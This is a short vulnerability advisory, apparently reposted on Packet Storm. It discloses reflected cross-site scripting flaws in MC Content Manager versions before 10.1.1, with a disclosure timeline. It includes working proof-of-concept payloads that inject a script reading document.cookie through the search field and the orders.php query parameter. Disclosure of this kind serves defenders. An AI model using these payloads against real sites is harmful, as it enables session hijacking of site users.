MC Content Managers versions prior to 10.1.1 suffers from cross site scripting vulnerabilities.
6ee9c7322db6a238aa75d533b56f10ad6e7a4df3589055c2aa8e838ad15cf83bHello list!
I want to warn you about Cross-Site Scripting vulnerabilities in MC Content
Manager. It's Ukrainian commercial CMS.
-------------------------
Affected products:
-------------------------
Vulnerable are previous versions of MC Content Manager (before version
v.10.1.1).
----------
Details:
----------
XSS (WASC-08):
POST request at page http://site/ru/cms/search
"><script>alert(document.cookie)</script>
In search field.
XSS (WASC-08):
http://site/orders.php?act=search&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
------------
Timeline:
------------
2010.11.11 - announced at my site.
2010.11.12 - informed developers.
2011.03.04 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4674/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed